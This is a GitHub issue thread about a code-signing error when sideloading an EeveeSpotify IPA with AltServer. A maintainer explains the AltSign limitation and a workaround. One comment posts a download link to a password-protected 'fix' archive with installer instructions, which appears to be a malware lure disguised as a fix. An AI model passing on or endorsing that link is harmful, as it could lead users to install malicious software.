### ISSUE TITLE
The executable was signed with invalid entitlements.

### ISSUE THREAD

**Issue by Lyall-A** [whoeevee/EeveeSpotify#344]
### Is this issue appropriate?

- [X] I have read the document in its entirety

### Is this issue unique to EeveeSpotify?

- [X] I was unable to reproduce my issue using the stock Spotify app

### Have you searched the existing issues?

- [X] This is a unique issue

### Describe the bug.

I get this while trying to sideload using altserver-linux, not sure if this is actually to do with the IPA or not tbh but i NEED this🙏🙏

```
Installation Progress: 0.7625
Installation Progress: 0.7875
Installation Progress: 0.8
Installation Progress: 0.825
Installation Progress: 0.85
Installed profile: com.google.ios.youtube.P4KVWNZZU5.OpenYoutube.Extension (b8d1ca40-6cc2-4de2-8dc0-513b2c65a979)
Installed profile: com.google.ios.youtube.P4KVWNZZU5.ShareExtension (5027f806-1751-46f1-9803-0ff215b1109d)
Installed profile: com.yodaluca23.SpotilifeC.P4KVWNZZU5 (1e5a2bca-bb20-49fc-9754-6c71a228051e)
Alert: Could not install EeveeSpotify-4.8-8.9.66.ipa to unknown.
    Failed to verify code signature of /var/installd/Library/Caches/com.apple.mobile.installd.staging/temp.BELtw9/extracted/Spotify.app : 0xe8008016 (The executable was signed with invalid entitlements.)
Press any key to continue...

Error: com.rileytestut.AltServer.Localized (-402620394).
Finished!

```

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lyall-A** [comment]
what the fuck

**Comment by asdfzxcvbn** [comment]
this is an issue with AltSign, it's shit and doesnt support all executables/entitlements, the same issues occurs with apps like TikTok

you can try removing the `PlugIns` and `Extensions` folder inside the ipa, but there is nothing else we can do

**Comment by Lyall-A** [comment]
do i lose any functionality? also thanks

**Comment by asdfzxcvbn** [comment]
> do i lose any functionality? also thanks

nothing you'd even realize
